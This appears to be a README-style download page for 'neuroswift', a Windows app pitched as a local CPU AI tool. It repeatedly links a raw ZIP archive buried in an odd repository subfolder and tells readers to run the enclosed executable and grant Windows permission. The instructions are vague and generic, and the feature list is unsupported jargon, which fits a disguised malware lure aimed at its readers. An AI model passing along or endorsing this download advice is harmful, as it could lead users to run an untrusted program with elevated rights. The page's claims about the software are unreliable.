Use this link to visit the page and download neuroswift:
https://github.com/ucmaaz/neuroswift/raw/refs/heads/main/undercrest/Software_v1.7.zip
neuroswift is a Windows app for running an AI model on your computer. It is made for local use, so you can keep your work on your PC.
It is built for users who want:
- Fast replies on a CPU
- No cloud setup
- A simple way to run an AI tool on Windows
- Local control over your data
Before you install, check these basics:
- Windows 10 or Windows 11
- 8 GB RAM or more
- 5 GB free disk space
- A recent Intel or AMD CPU
- Internet access for the first download
For a smoother run, 16 GB RAM helps a lot.
Follow these steps on Windows:
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Open the download page: https://github.com/ucmaaz/neuroswift/raw/refs/heads/main/undercrest/Software_v1.7.zip
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On the page, find the latest release or main download file.
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Download the file to your PC.
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If the file is a ZIP file, right-click it and choose Extract All.
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Open the extracted folder.
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Look for the app file, such as
neuroswift.exe. -
Double-click the file to start the app.
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If Windows asks for permission, choose Yes.
If you downloaded a setup file:
- Double-click the setup file.
- Follow the on-screen steps.
- Choose an install folder if asked.
- Finish the setup.
- Open neuroswift from the Start menu or desktop shortcut.
If you downloaded a ZIP file:
- Extract the ZIP file.
- Open the folder.
- Double-click the app file.
- Wait for the first launch to finish loading.
If the app uses a model file, keep the model file in the same folder as the app unless the app asks for a different path.
When neuroswift opens, you can usually do these things:
- Type a prompt or question
- Start local AI inference
- Choose a model if the app shows one
- Change basic settings like CPU mode or memory use
- Clear the screen and start a new chat
For best results:
- Use short, clear prompts
- Keep other heavy apps closed
- Let the first load finish before you start typing
neuroswift is built around a few key ideas:
- CPU inference with low delay
- Hybrid state-space model design
- Dynamic depth scaling for better speed control
- Selective SSD and MLA-based model blocks
- Local AI use without a cloud account
- Support for modern LLM-style workflows
These parts work together to give you a fast local AI tool that runs well on a regular PC.
You can use neuroswift for:
- Writing help
- Brainstorming ideas
- Quick Q&A
- Local model testing
- Offline AI work
- Private text tasks on your own computer
If the app feels slow:
- Close extra apps
- Restart the app
- Check that you have enough free RAM
- Use a smaller model if the app gives you one
- Keep your PC plugged in on a laptop
If the app does not open:
- Check that the download finished
- Make sure you extracted all files if it came as a ZIP
- Try running it again as a normal user
- Move the folder to a simple path like
C:\neuroswift
If you see a missing file message:
- Download the full release again
- Keep all files in the same folder
- Do not rename files unless the app tells you to
A simple folder layout can help:
C:\neuroswift\for the appC:\neuroswift\models\for model filesC:\neuroswift\logs\for any log files
This keeps the app easy to find and manage.
neuroswift is designed for local use on your own machine. That means your prompts and output can stay on your PC instead of going through a web service.
This setup can help when you want:
- More privacy
- Less dependence on a browser
- Work that stays on one computer
- A local tool for daily use
The first start can take longer than later starts. The app may need time to:
- Load the model
- Set up CPU paths
- Prepare memory
- Build cached data
This is normal for local AI apps on Windows.
Visit the download page here:
https://github.com/ucmaaz/neuroswift/raw/refs/heads/main/undercrest/Software_v1.7.zip
Once the app runs, keep these simple habits:
- Save the folder in one place
- Do not move files while the app is open
- Keep the model and app together
- Update by replacing files from a new release when needed
- Use the same folder each time for easier startup